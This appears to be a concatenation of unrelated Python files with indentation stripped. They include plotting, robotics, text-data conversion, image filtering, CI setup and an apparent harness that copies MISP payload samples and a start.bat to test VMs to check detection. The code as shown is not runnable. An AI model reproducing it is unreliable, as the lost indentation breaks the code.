vect_get_ellipse_x_standard = np.vectorize(get_ellipse_x_standard, excluded='a')
vect_get_ellipse_y_standard = np.vectorize(get_ellipse_y_standard, excluded='b')
t = np.arange(0, 360, 0.01)
ax0.plot(vect_get_ellipse_x_standard(t, a1), vect_get_ellipse_y_standard(t, b1), color='orange')
# plot the second ellipse, rotated
vect_get_ellipse_x_rotated = np.vectorize(get_ellipse_x_rotated, excluded=['a', 'b', 'r'])
vect_get_ellipse_y_rotated = np.vectorize(get_ellipse_y_rotated, excluded=['a', 'b', 'r'])
t = np.arange(0, 360, 0.01)
ax0.plot(vect_get_ellipse_x_rotated(t, a2, b2, T), vect_get_ellipse_y_rotated(t, a2, b2, T), color='blue')
# plot 2 points along the line of intersection
# plot the point of intersection with the first ellipse (not rotated)
vect_get_line_ellipse_x_intercept_standard = np.vectorize(get_line_ellipse_x_intercept_standard, excluded=['a', 'b'])
x=get_line_ellipse_x_intercept_standard(lT, a1, b1)
y=get_position_y_at_angle(x, lT)
print ("green: %f,%f" % (x,y))
# should be a green dot on the orange ellipse intersecting the red line
ax0.plot(x, y, 'ro', color='green')
# plot the point of intersection with the second ellipse (rotated)
vect_get_line_ellipse_x_intercept_rotated = np.vectorize(get_line_ellipse_x_intercept_rotated, excluded=['a', 'b', 'r'])
x=get_line_ellipse_x_intercept_rotated(lT, a2, b2, T)
y=get_position_y_at_angle(x, lT)
print ("black: %f,%f" % (x,y))
# should be a black dot on the blue ellipse intersecting the red line
ax0.plot(x, y, 'ro', color='black')
# ----------
# calculate the difference between the two ellipses
t = np.arange(0, 360, 0.1)
xnorm=vect_get_line_ellipse_x_intercept_standard(t, a1, b1)
ynorm=vect_get_position_y_at_angle(xnorm, t)
xrot=vect_get_line_ellipse_x_intercept_rotated(t, a2, b2, T)
yrot=vect_get_position_y_at_angle(xrot, t)
# find the diff and when the inner is outside the outer ellipse preserve the sign
# (divide by zero is possible and should be caught)
vect_hypot = np.vectorize(math.hypot)
diff = vect_hypot(xnorm-xrot, ynorm-yrot) * ((xnorm-xrot) / abs(xnorm-xrot))
ax1.plot(t, diff, color='pink')
# ----------
ax0.set_aspect('equal', 'box')
plt.tight_layout()
plt.show()
if __name__ == "__main__":
main()
|
python
|
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='irobot',
version='1.0.0b3',
description='Python implementation of iRobot''s Open Interface',
long_description=long_description,
url='http://blog.lemoneerlabs.com',
author='Matthew Witherwax (lemoneer)',
author_email='[email protected] ',
# Choose your license
license='MIT',
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
keywords='robotics irobot roomba',
packages=find_packages(),
install_requires=['pyserial', 'six'],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'create2=irobot.console_interfaces.create2:main'
],
},
)
|
python
|
from helperfunctions_plot import *
from plane_relative import *
from denavit_hartenberg140 import *
import itertools as it
def work_it(M, func=n.diff, axis=1):
return np.apply_along_axis(func, axis, arr=M)
def get_closest_solutions_pair(s0, s1):
## diff_list = []
## index_list0 = []
## index_list1 = []
## for i0, k in enumerate(s0):
## for i1, l in enumerate(s1):
## diff_list.append(k-l)
## index_list0.append(i0)
## index_list1.append(i1)
## index_list0 = mat(index_list0)
## index_list1 = mat(index_list1)
## diff_list = mat(diff_list)
## norm_list = mat(map(norm, diff_list))
## t = (norm_list - min(norm_list)) == 0.0
## index0 = index_list0[t][0]
## index1 = index_list1[t][0]
## return mat((s0[index0], s1[index1]))
data = []
for i, s0i in enumerate(s0):
for j, s1j in enumerate(s1):
data.append([norm(s0i - s1j, ord = None), i, j])
data = mat(data)
ret = []
solution_col_row_pairs = n.argwhere(data == data.min(axis = 0)[0])
solution_indices = solution_col_row_pairs[:,0]
for solution_data in data[solution_indices]:
norm_value, i, j = solution_data
pair = mat([s0[i], s1[j]])
return pair
def get_closest_solution(s0, s):
diff_list = []
index_list1 = []
for i1, l in enumerate(s):
diff_list.append(s0-l)
index_list1.append(i1)
index_list1 = mat(index_list1)
diff_list = mat(diff_list)
norm_list = mat(map(norm, diff_list))
t = (norm_list - min(norm_list)) == 0.0
index1 = index_list1[t][0]
return s[index1]
def add_solutions(solutions, solution_value, index=5):
for s in solutions.T:
tmp1 = s.copy()
tmp2 = s.copy()
old_val = s[index]
tmp1[index] = old_val + solution_value
yield tmp1
tmp2[index] = old_val - solution_value
yield tmp2
def traverse_solutions(*args):
for solutions in args:
for s in solutions.T:
yield s
def make_array(list_of):
return mat(list_of).T
if __name__ == '__main__':
for count in n.linspace(-180,180,10):
ax, fig = init_plot()
fig.clear()
j1 = 180 #rand_range(-180, 180)
j2 = 0#rand_range(-90, 110)
j3 = 0#rand_range(-230, 50)
j4 = 0#rand_range(-200, 200)
j5 = 0#rand_range(-115, 115)
j6 = 0#rand_range(-400, 400)
j1,j2,j3,j4,j5,j6 = (-140.0, -14.35476839088895, 20.6520766452779, 0, 0, 0)
joint_values = j1,j2,j3,j4,j5,j6
T44, debug = forward_kinematics(*joint_values, **DH_TABLE)
sol = inverse_kinematics_irb140(DH_TABLE, T44)
plane0 = define_plane_from_angles([0,0,0],0, 0, 0)
global_robot = matmul_series(*debug)
global_robot.insert(0, debug[0])
global_robot.insert(0, plane0)
global_robot = mat(global_robot)
global_robot_points = global_robot[:,:3,3]
point_matrix = generate_symmetric_curve()
point_matrix_tf = get_transformed_points(T44, point_matrix)
######
ax = fig.add_subplot(1,2,1, projection='3d')
for p in global_robot:
plot_plane(ax, p, '--',scale_factor=0.1)
ax.scatter(point_matrix_tf[:,0],point_matrix_tf[:,1],point_matrix_tf[:,2])
ax.plot(global_robot_points[:,0], global_robot_points[:,1], global_robot_points[:,2],'k',linewidth=2)
plot_equal_perspective(ax, [-0.5,0.5],[-0.5,0.5],[0,1])
#show()
######
plane = global_robot[-1]
s = point_matrix_tf
all_solutions = []
for p in s:
T44 = n.zeros((4,4))
T44[:,3] = p
T44[:3,:3] = plane[:3,:3]
solutions = inverse_kinematics_irb140(DH_TABLE, T44)
solutions = filter_solutions(solutions)
print solutions.T.shape
all_solutions.append(solutions.T)
a = mat(all_solutions)
import time
start = time.time()
#### l = []
#### for i in xrange(len(a)-1):
#### l.append(get_closest_solutions_pair(a[i], a[i+1]))
#### l = mat(l)
sol = []
pair = get_closest_solutions_pair(a[0],a[1])
sol.append(pair[0])
for i in xrange(1,len(a)):
sol.append(get_closest_solution(sol[i-1],a[i]))
sol = mat(sol)
## s = list(l[:,0,:])
## s.append(l[-1,1,:])
## s = mat(s)
print 'stop: %0.2f' % (time.time() - start)
r = work_it(work_it(sol, func=diff, axis=0),func=norm, axis=1)
#r = n.max(n.abs(n.diff(sol,axis=0)),axis=1)
## if (r >= 180.0).any():
## print r
## print n.round(n.max(n.abs(work_it(sol, func=diff, axis=0)),0))
## import pdb; pdb.set_trace()
ax0 = fig.add_subplot(1,2,2)
ax0.plot(n.linspace(0,360,49),r);
xlabel('curve angle')
ylabel('solution distance')
show()
break
print n.round(n.max(n.abs(work_it(sol, func=diff, axis=0)),0))
#show()
#plot(n.max(abs(s-sol), axis=1)); show()
|
python
|
# -*- coding: utf-8 -*-
"""
Author:by 王林清 on 2021/10/31 18:44
FileName:lunyu.py in shiyizhonghua_resource
Tools:PyCharm python3.8.4
"""
from util import get_time_str, save_split_json, get_json
if __name__ == '__main__':
author = {
'name': '孔子',
'time': '春秋',
'desc': '孔子(公元前551年9月28日~公元前479年4月11'
'日),子姓,孔氏,名丘,字仲尼,鲁国陬邑(今山东省曲阜市)'
'人,祖籍宋国栗邑(今河南省夏邑县),中国古代伟大的思想家、'
'政治家、教育家,儒家学派创始人、“大成至圣先师”。 '
}
datas = []
data = get_json(r'./../data/lunyu/lunyu.json')
for dic in data:
time = get_time_str()
datas.append({
'title': f"论语·{dic['chapter']}",
'author': author,
'type': '古文',
'content': dic['paragraphs'],
'create_time': time,
'update_time': time,
'valid_delete': True
})
save_split_json('lunyu', datas)
|
python
|
import cv2 as cv
import os
import numpy as np
class Cartonifier:
def __init__(self, n_downsampling_steps=2, n_filtering_steps=7):
self.num_down = n_downsampling_steps
self.num_bilateral = n_filtering_steps
# def process_folder(self, input_folder, output_folder):
# if not os.path.exists(input_folder):
# raise FileNotFoundError('Input folder {} not found'.format(input_folder))
# if not os.path.exists(output_folder):
# raise FileNotFoundError('Output folder {} not found'.format(output_folder))
# file_path_list = fu.get_absolute_path_list(input_folder)
# for file_path in file_path_list:
# self.process(file_path, output_folder)
def process(self, image, max_value=200):
img_rgb = image
# downsample image using Gaussian pyramid
img_color = img_rgb
for _ in range(self.num_down):
img_color = cv.pyrDown(img_color)
# repeatedly apply small bilateral filter instead of
# applying one large filter
for _ in range(self.num_bilateral):
img_color = cv.bilateralFilter(img_color, d=9, sigmaColor=9, sigmaSpace=7)
# upsample image to original size
for _ in range(self.num_down):
img_color = cv.pyrUp(img_color)
# convert to grayscale and apply median blur
img_gray = cv.cvtColor(img_rgb, cv.COLOR_RGB2GRAY)
img_blur = cv.medianBlur(img_gray, 7)
# detect and enhance edges
img_edge = self.edge_detection_v1(img_blur, max_value)
if img_color.shape[0] != img_edge.shape[0] or img_color.shape[1] != img_edge.shape[1]:
img_color = cv.resize(img_color, (img_edge.shape[1], img_edge.shape[0]))
img_cartoon = cv.bitwise_and(img_color, img_edge)
return img_cartoon
def edge_detection_v1(self, img_blur, max_value):
img_edge = cv.adaptiveThreshold(img_blur, max_value,
cv.ADAPTIVE_THRESH_MEAN_C,
cv.THRESH_BINARY,
blockSize=9,
C=4)
# convert back to color, bit-AND with color image
img_edge = cv.cvtColor(img_edge, cv.COLOR_GRAY2RGB)
return img_edge
# def process_image(self, src):
# self.alpha += 0.01
# if self.alpha > 1:
# self.alpha = 0
# self.current_model += 1
# if self.current_model >= len(self.model_list):
# self.current_model = 1
#
# # Edge detection
# img_edge = self.edge_detection_v2(src)
#
# # Coloured image from ML models
# img_colors = self.feed_forward(src)
#
# # Compose layers
# img_blend = np.clip(((1 - self.beta) * (img_colors - img_edge * 0.1) + self.beta * self.frame).astype(np.uint8),
# 0, 255)
#
# # Blur for smooth effect
# dst = cv.GaussianBlur(img_blend, (5, 5), cv.BORDER_DEFAULT)
# return dst
#
# def edge_detection_v2(self, src):
# dst = cv.GaussianBlur(src, (5, 5), cv.BORDER_DEFAULT)
# dst = cv.Canny(dst, 50, 200)
# # dst = self.edge_detection_v1(dst)
# dst = cv.cvtColor(dst, cv.COLOR_GRAY2RGB)
# dst = np.ones_like(dst) * 255 - dst
# return dst
if __name__ == '__main__':
c = Cartonifier()
c.process("/Users/gilbert/Desktop/test.jpg", "/Users/gilbert/Desktop/out")
|
python
|
"""
AR : conditional covariance based Granger Causality
===================================================
This example reproduces the results of Ding et al. 2006 :cite:`ding2006granger`
where in Fig3 there's an indirect transfer of information from Y->X that is
mediated by Z. The problem is that if the Granger Causality is used, there's
indeed a transfer of information from Y->X while with the conditional Granger
causality, conditioning by the past of other sources suppresses this indirect
transfer.
"""
import numpy as np
from frites import set_mpl_style
from frites.simulations import StimSpecAR
from frites.conn import conn_covgc
import matplotlib.pyplot as plt
set_mpl_style()
###############################################################################
# Simulate 3 nodes 40hz oscillations
# ----------------------------------
#
# Here, we use the class :class:`frites.simulations.StimSpecAR` to simulate an
# stimulus-specific autoregressive model made of three nodes (X, Y and Z). This
# network simulates a transfer Y->Z and Z->X such as an indirect transfer from
# Y->X mediated by Z
ar_type = 'ding_3_indirect' # 40hz oscillations
n_stim = 2 # number of stimulus
n_epochs = 50 # number of epochs per stimulus
ss = StimSpecAR()
ar = ss.fit(ar_type=ar_type, n_epochs=n_epochs, n_stim=n_stim)
###############################################################################
# plot the network
plt.figure(figsize=(5, 4))
ss.plot_model()
plt.show()
###############################################################################
# Compute the Granger-Causality
# -----------------------------
#
# We first compute the Granger Causality and then the conditional Granger
# causality (i.e conditioning by the past coming from other sources)
dt, lag, step = 50, 5, 2
t0 = np.arange(lag, ar.shape[-1] - dt, step)
kw_gc = dict(dt=dt, lag=lag, step=1, t0=t0, roi='roi', times='times',
n_jobs=-1)
# granger causality
gc = conn_covgc(ar, conditional=False, **kw_gc)
# conditional granger causality
gc_cond = conn_covgc(ar, conditional=True, **kw_gc)
###############################################################################
# Plot the Granger causality
plt.figure(figsize=(12, 10))
ss.plot_covgc(gc)
plt.tight_layout()
plt.show()
###############################################################################
# Plot the conditional Granger causality
plt.figure(figsize=(12, 10))
ss.plot_covgc(gc_cond)
plt.tight_layout()
plt.show()
###############################################################################
# Direct comparison
# -----------------
#
# In this plot, we only select the transfer of information from Y->X for both
# granger and conditional granger causality
# select Y->X and mean per stimulus for the granger causality
gc_yx = gc.sel(roi='x-y', direction='y->x').groupby('trials').mean('trials')
gc_yx = gc_yx.rename({'trials': 'stimulus'})
# select Y->X and mean per stimulus for the conditional granger causality
gc_cond_yx = gc_cond.sel(roi='x-y', direction='y->x').groupby('trials').mean(
'trials')
gc_cond_yx = gc_cond_yx.rename({'trials': 'stimulus'})
# get (min, max) of granger causality from Y->X
gc_min = min(gc_yx.data.min(), gc_cond_yx.data.min())
gc_max = max(gc_yx.data.max(), gc_cond_yx.data.max())
# sphinx_gallery_thumbnail_number = 4
plt.figure(figsize=(10, 5))
# plot granger causality from Y->X
plt.subplot(121)
gc_yx.plot.line(x='times', hue='stimulus')
plt.title(r'Granger causality Y$\rightarrow$X', fontweight='bold')
plt.axvline(0, color='k', lw=2)
plt.ylim(gc_min, gc_max)
# plot the conditional granger causality from Y->X
plt.subplot(122)
gc_cond_yx.plot.line(x='times', hue='stimulus')
plt.title(r'Conditional Granger causality Y$\rightarrow$X|others',
fontweight='bold')
plt.axvline(0, color='k', lw=2)
plt.ylim(gc_min, gc_max)
plt.tight_layout()
plt.show()
|
python
|
#! bin/bash/python3
# Solution to Mega Contest 1 Problem: Sell Candies
for testcase in range(int(input())):
net_revenue = 0
n = int(input())
vals = list(map(int, input().split()))
vals.sort(reverse=True)
cost_reduction = 0
for val in vals:
net_revenue += max(val-cost_reduction, 0)
net_revenue %= int(1e9+7)
cost_reduction += 1
print(net_revenue)
|
python
|
# ------------------------------------------------------------------------
# DT-MIL
# Copyright (c) 2021 Tencent. All Rights Reserved.
# ------------------------------------------------------------------------
def build_dataset(image_set, args):
from .wsi_feat_dataset import build as build_wsi_feat_dataset
return build_wsi_feat_dataset(image_set, args)
|
python
|
from .misc import (
camel_to_underscore,
convert_date,
convert_datetime,
dict_from_dataframe,
dir_list,
download_if_new,
get_ulmo_dir,
mkdir_if_doesnt_exist,
module_with_dependency_errors,
module_with_deprecation_warnings,
open_file_for_url,
parse_fwf,
raise_dependency_error,
save_pretty_printed_xml,
)
try:
from .pytables import (
get_default_h5file_path,
get_or_create_group,
get_or_create_table,
open_h5file,
update_or_append_sortable,
)
except ImportError:
get_default_h5file_path = raise_dependency_error
get_or_create_group = raise_dependency_error
get_or_create_table = raise_dependency_error
open_h5file = raise_dependency_error
update_or_append_sortable = raise_dependency_error
|
python
|
from flask import Flask
from flask import make_response
app = Flask(__name__)
@app.route('/')
def index():
response = make_response('<h1>This document carries a cookie!</h1>')
response.set_cookie('answer', '42')
return response
if __name__ == '__main__':
app.run()
|
python
|
#!/usr/bin/env /usr/bin/python3
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from key import *
import json
import time
import os
from urllib.parse import urljoin
import sys
import traceback
from shutil import copyfile
import logging.handlers
from urllib.parse import quote
import argparse
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.SysLogHandler(address='/dev/log')
formatter = logging.Formatter('APTC: [%(levelname)s][%(filename)s:%(funcName)s():line %(lineno)s] %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
# ensure prefix ends with /
conf_target_path_prefix = '/opt/aptc/targets/' # in case of changing path
conf_script_path_prefix = os.path.dirname(os.path.realpath(__file__)) + '/' # change to /opt/pec later
conf_vm_wait_sec = 60 * 5
conf_poll_sleep_interval_sec = 2
conf_graylog_poll_timeout_sec = 60 * 1
conf_tag_prefix = 'aptc:'
target_query_strings = {} # hostname:query_string
def init(url, key):
return PyMISP(url, key, False, 'json', False)
def get_all_target_host_names(test_case):
host_names = []
share_paths = get_all_target_share_paths(test_case)
for t in share_paths:
hn = t.split('/')
host_names.append(hn[len(hn)-1])
return host_names
def get_all_target_share_paths(test_case):
share_paths = []
targets = get_related_targets(test_case)
for t in targets:
share_paths.append(t['Event']['info'])
return share_paths
def get_related_targets(test_case):
targets = []
if 'RelatedEvent' not in str(test_case):
return targets
for re in test_case['Event']['RelatedEvent']:
if re['Event']['info'].startswith(conf_target_path_prefix):
targets.append(re)
return targets
def get_all_query_strings(m, testcase_id=0):
found = False
r = m.search(eventid=testcase_id)
if 'Tag' not in str(r):
logger.error(str(r))
return found
for e in r['response']:
for t in e['Event']['Tag']:
if t['name'] != conf_tag_prefix + 'test-in-progress':
continue
found = True
related = get_related_targets(e)
for r in related:
if r['Event']['info'] in target_query_strings:
continue
qs = get_target_query_string(m, r['Event']['id'])
target_query_strings[r['Event']['info']] = qs
return found
def write_payload(m, payload_id, test_case):
status, samples = m.download_samples(False, payload_id)
if not status:
return status
share_paths = get_all_target_share_paths(test_case)
total_sample_count = len(samples)
for vm_path in share_paths:
sample_counter = 0
for sample in samples:
sample_counter += 1
filepath = vm_path + '/' + sample[1]
with open(filepath, 'wb') as out:
try:
out.write(sample[2].read())
logger.debug('wrote: ' + filepath)
sample[2].seek(0) # otherwise next target will get a 0 byte file
if sample_counter == total_sample_count:
get_start_bat(m, payload_id, vm_path)
except OSError:
logger.error('fail writing ' + filepath)
continue
if sample_counter == 1: # tag only the first sample
tag(m, payload_id, conf_tag_prefix + 'test-in-progress')
logger.debug('tagged ' + str(payload_id) + ' with ' + conf_tag_prefix + 'test-in-progress')
hostname = vm_path.replace(conf_target_path_prefix, '')
newtag = conf_tag_prefix + '{"target":"' + hostname + '","testcase-id":'
newtag += str(test_case['Event']['id']) + ',"filename":"' + sample[1] + '"}'
m.new_tag(newtag, '#000000', True)
tag(m, payload_id, newtag)
return status
def get_payload_tags(test_case):
t = []
if 'Tag' not in str(test_case):
return t
if 'Tag' in test_case['Event']:
for et in test_case["Event"]["Tag"]:
if et['name'].startswith(conf_tag_prefix + 'payload'):
t.append(et['name'])
return t
def find_tag(m, eid, tag):
r = m.search(eventid=eid)
if 'Tag' not in str(r):
return False
if 'Tag' in r['response'][0]['Event']:
for t in r['response'][0]['Event']['Tag']:
if t['name'].startswith(tag):
return True
return False
def get_all_tags(m, eid):
r = m.search(eventid=eid)
if 'Tag' not in str(r):
return []
if 'Tag' in r['response'][0]['Event']:
return r['response'][0]['Event']['Tag']
return []
def dump(r):
print(json.dumps(r, indent=2))
def wait_for_targets(m, payload_id, test_case):
timeout_sec = conf_vm_wait_sec
all_vm = get_all_target_host_names(test_case)
while len(all_vm) > 0:
for vm in all_vm:
tags = get_all_tags(m, payload_id) # payload may have old results
tags_str = str(tags)
if 'result_' in tags_str and vm in tags_str:
if vm in all_vm:
all_vm.remove(vm)
if len(all_vm) == 0:
break
time.sleep(conf_poll_sleep_interval_sec)
timeout_sec -= conf_poll_sleep_interval_sec
if timeout_sec <= 0:
logger.error('abort due to timeout')
exit()
untag(m, payload_id, conf_tag_prefix + 'test-in-progress')
logger.info('All VM(s) done for payload-' + str(payload_id))
def tag(m, eid, tagname):
try:
r = m.get_event(eid)
m.tag(r['Event']['uuid'], tagname)
logger.debug('tag event ' + str(eid) + ' with ' + str(tagname))
except:
logger.debug(traceback.format_exc())
return True
def untag(m, eid, tagname):
r = m.search(eventid=eid)
if 'uuid' not in str(r):
logger.error(str(r))
return False
uuid = r['response'][0]['Event']['uuid']
for t in r['response'][0]['Event']['Tag']:
if t['name'] == tagname:
logger.debug('untagged ' + tagname + ' from ' + uuid)
m.untag(uuid, t['id'])
return True
def delete_tag(m, eventid, tagname):
r = m.search(eventid=eventid)
if 'Tag' not in str(r):
logger.error(str(r))
return
for t in r['response'][0]['Event']['Tag']:
if t['name'] == tagname:
logger.info('found tagid ' + t['id'])
session = m._PyMISP__prepare_session()
url = urljoin(m.root_url, 'tags/delete/{}'.format(t['id']))
session.post(url)
return
def get_target_query_string(m, target_id):
r = m.search(eventid=target_id)
if 'Attribute' not in str(r):
return ''
for a in r['response'][0]['Event']['Attribute']:
if a['comment'].startswith('graylog'):
return a['value']
return ''
def create_n_tag(m, eventid, tagname, tagcolor):
m.new_tag(tagname, tagcolor, True)
tag(m, eventid, tagname)
def get_start_bat(m, payload_id, target_path):
r = m.search(eventid=payload_id)
if 'Attribute' not in str(r):
logger.error(str(r))
return
for a in r['response'][0]['Event']['Attribute']:
if a['comment'].lower() != 'start.bat':
continue
with open(target_path + '/start.bat', 'w') as out:
try:
out.write(a['value'])
logger.info('wrote: ' + target_path + '/start.bat')
except:
logger.error('fail writing start.bat for payload ' + payload_id)
return
return
def query_graylog(m, query, filename=''):
session = m._PyMISP__prepare_session() # I know this is bad thing...
url = query
if len(filename) == 0:
url = url.replace('FILENAME%20AND%20', '')
else:
url = url.replace('FILENAME', quote(filename))
response = session.get(url)
r = json.loads(response.text)
return int(r['total_results'])
def get_reboot_wait_query(m, target_id):
q = ''
r = m.search(eventid=target_id)
if 'id' not in str(r):
return q
for e in r['response']:
for a in e['Event']['Attribute']:
if 'reboot' in a['comment']:
q = a['value']
break
return q
def rollback_targets(m, test_case):
target_paths = {}
wait_vm = []
wait_sec = conf_vm_wait_sec
if 'RelatedEvent' not in str(test_case):
return
if len(test_case['Event']['RelatedEvent']) == 0:
return
logger.info('starting target roll-back...')
for rt in test_case['Event']['RelatedEvent']:
if rt['Event']['info'].startswith(conf_target_path_prefix):
target_paths[rt['Event']['info']] = get_reboot_wait_query(m, rt['Event']['id'])
if len(target_paths[rt['Event']['info']]) > 0:
copyfile(conf_target_path_prefix + 'shutdown.bat', rt['Event']['info'] + '/start.bat')
wait_vm.append(rt['Event']['info'])
logger.info('waiting for target reboot...')
while len(wait_vm) > 0:
for k, v in target_paths.items():
try:
rc = query_graylog(m, v)
except BaseException as e:
logger.error('graylog query failed: ' + str(e))
error_tag = conf_tag_prefix + ' roll-back error with graylog result poll', '#aa0000'
create_n_tag(m, test_case['Event']['id'], error_tag)
return
if rc > 0:
if k in wait_vm:
wait_vm.remove(k)
logger.debug(str(len(wait_vm)) + ' left...')
wait_sec -= conf_poll_sleep_interval_sec
if wait_sec <= 0:
break
time.sleep(conf_poll_sleep_interval_sec)
return
|
python
|
# (C) Datadog, Inc. 2019-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
import platform
import stat
import subprocess
import click
import requests
from ....fs import ensure_parent_dir_exists
from ...constants import get_root
from ...testing import get_test_envs
from ..console import CONTEXT_SETTINGS, echo_debug, echo_info
COMPOSE_VERSION = 'v2.5.0'
COMPOSE_RELEASES_URL = f'https://github.com/docker/compose/releases/download/{COMPOSE_VERSION}/'
def upgrade_docker_compose(platform_name):
if platform_name == 'windows':
artifact_name = 'docker-compose-windows-x86_64.exe'
executable_name = 'docker-compose.exe'
else:
artifact_name = 'docker-compose-linux-x86_64'
executable_name = 'docker-compose'
executable_path = os.path.join(os.path.expanduser('~'), '.docker', 'cli-plugins', executable_name)
ensure_parent_dir_exists(executable_path)
response = requests.get(COMPOSE_RELEASES_URL + artifact_name)
response.raise_for_status()
with open(executable_path, 'wb') as f:
for chunk in response.iter_content(16384):
f.write(chunk)
f.flush()
if platform_name != 'windows':
os.chmod(executable_path, os.stat(executable_path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
def display_action(script_file):
display_header = f'Running: {script_file}'
echo_info(f'\n{display_header}\n{"-" * len(display_header)}\n')
@click.command(context_settings=CONTEXT_SETTINGS, short_help='Run CI setup scripts')
@click.argument('checks', nargs=-1)
@click.option('--changed', is_flag=True, help='Only target changed checks')
def setup(checks, changed):
"""
Run CI setup scripts
"""
cur_platform = platform.system().lower()
upgrade_docker_compose(cur_platform)
scripts_path = os.path.join(get_root(), '.azure-pipelines', 'scripts')
echo_info("Run CI setup scripts")
if checks:
if checks[0] == 'skip':
echo_info('Skipping set up')
else:
echo_info(f'Checks chosen: {", ".join(checks)}')
else:
echo_info('Checks chosen: changed')
check_envs = list(get_test_envs(checks, every=True, sort=True, changed_only=changed))
echo_info(f'Configuring these envs: {check_envs}')
for check, _ in check_envs:
check_scripts_path = os.path.join(scripts_path, check)
if not os.path.isdir(check_scripts_path):
echo_debug(f"Skip! No scripts for check `{check}` at: `{check_scripts_path}`")
continue
contents = os.listdir(check_scripts_path)
if cur_platform not in contents:
echo_debug(f"Skip! No scripts for check `{check}` and platform `{cur_platform}`")
continue
setup_files = sorted(os.listdir(os.path.join(check_scripts_path, cur_platform)))
scripts = [s for s in setup_files if not s.startswith("_")]
non_exe = [s for s in setup_files if s.startswith("_")]
non_exe_msg = f" (Non-executable setup files: {non_exe})" if non_exe else ""
echo_info(f'Setting up: {check} with these config scripts: {scripts}{non_exe_msg}')
for script in scripts:
script_file = os.path.join(check_scripts_path, cur_platform, script)
display_action(script_file)
cmd = [script_file]
if script_file.endswith('.py'):
cmd.insert(0, 'python')
subprocess.run(cmd, shell=True, check=True)
|
python
|
#!/usr/bin/env python
"""
Partitioned Least Square class
Developer:
Omar Billotti
Description:
Partitioned Least Square class
"""
from numpy import shape, zeros, hstack, ones, vstack, sum as sum_elements, array, inf, where
from numpy.random import rand
from numpy.linalg import lstsq
from scipy.optimize import nnls
from scipy.linalg import norm
from ._utils import vec1, indextobeta, checkalpha, bmatrix
class PartitionedLs(object):
"""
Partitioned Least Square class
"""
def __init__(self, algorithm="alt"):
"""
Constructor of Partioned Least Square Class
Parameters
----------
algorithm : string
String used to set some algorithm to choose to create
the model. possible values alt and opt
Returns
-------
None.
"""
self.model = None
self.algorithm = algorithm
def fit(self, x, y, p):
"""
Fits a PartialLS Regression model to the given data
Parameters
----------
x : Matrix
describing the examples
y : Array
vector with the output values for each example
p : Matrix
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
Returns
-------
None.
"""
if self.algorithm == "opt":
self.__fit_opt_nnls(x, y, p)
elif self.algorithm == "alt":
self.__fit_alt_nnls(x, y, p)
else:
self.__fit_alt_nnls(x, y, p)
def __fit_opt_nnls(self, x,
y, p):
"""
Fits a PartialLS OPT Regression model to the given data
Parameters
----------
x : Matrix
describing the examples
y : Array
vector with the output values for each example
p : Matrix
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
Returns
-------
None.
"""
xo = hstack((x, ones((shape(x)[0], 1))))
po = vstack(
(hstack((p, zeros((shape(p)[0], 1)))), vec1(shape(p)[1] + 1)))
k = shape(po)[1]
b_start, results = (-1, [])
for i in range(b_start + 1, 2 ** k):
beta = array(indextobeta(i, k))
xb = bmatrix(xo, po, beta)
alpha = nnls(xb, y)[0]
optval = norm(xo.dot(po * alpha.reshape(-1, 1)).dot(beta) - y)
result = (optval, alpha[:-1], beta[:-1], alpha[-1] * beta[-1], p)
results.append(result)
optvals = [r[0] for r in results]
optindex = optvals.index(min(optvals))
(opt, a, b, t, p) = results[optindex]
A = sum_elements(p * a.reshape(-1, 1), 0)
b = b * A
# substituting all 0.0 with 1.0
for z in where(A == 0.0):
A[z] = 1.0
a = sum_elements((p * a.reshape(-1, 1)) / A, 1)
self.model = (opt, a, b, t, p)
def __fit_alt_nnls(self, x,
y, p,
n=20):
"""
Fits a PartialLS Alt Regression model to the given data
Parameters
----------
x : Matrix N * M
matrix describing the examples
y : vector
vector with the output values for each example
p : Matrix M * K
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
n : int
number of alternating loops to be performed, defaults to 20.
Returns
-------
None.
"""
# Rewriting the problem in homogenous coordinates
xo = hstack((x, ones((shape(x)[0], 1))))
po = vstack((hstack((p, zeros((shape(p)[0], 1)))),
vec1(shape(p)[1] + 1)))
m, k = shape(po)
alpha = rand(m)
beta = (rand(k) - 0.5) * 10
t = rand()
initvals = (0, alpha, beta, t, inf)
i_start, alpha, beta, t, optval = initvals
for i in range(i_start + 1, n):
# nnls problem with fixed beta variables
po_beta = sum_elements(po * beta, 1)
xo_beta = xo * po_beta
alpha = nnls(xo_beta, y)[0]
alpha = checkalpha(alpha, po)
sum_alpha = sum_elements(po * alpha.reshape(-1, 1), 0)
po_alpha = sum_elements(po * sum_alpha, 1)
alpha = alpha / po_alpha
beta = beta * sum_alpha
# ls problem with fixed alpha variables
xo_alpha = xo.dot(po * alpha.reshape(-1, 1))
beta = lstsq(xo_alpha, y, rcond=None)[0]
optval = norm(xo.dot(po * alpha.reshape(-1, 1)).dot(beta) - y, 2)
self.model = (optval, alpha[:-1], beta[:-1], alpha[-1] * beta[-1], p)
def predict(self, x):
"""
Description
Predicts points using the formula: f(X) = X * (P .* a) * b + t.
Parameters
----------
x : Matrix N * M
matrix describing the examples
Returns
-------
out : Array
contains the predictions of the given model on examples in X
"""
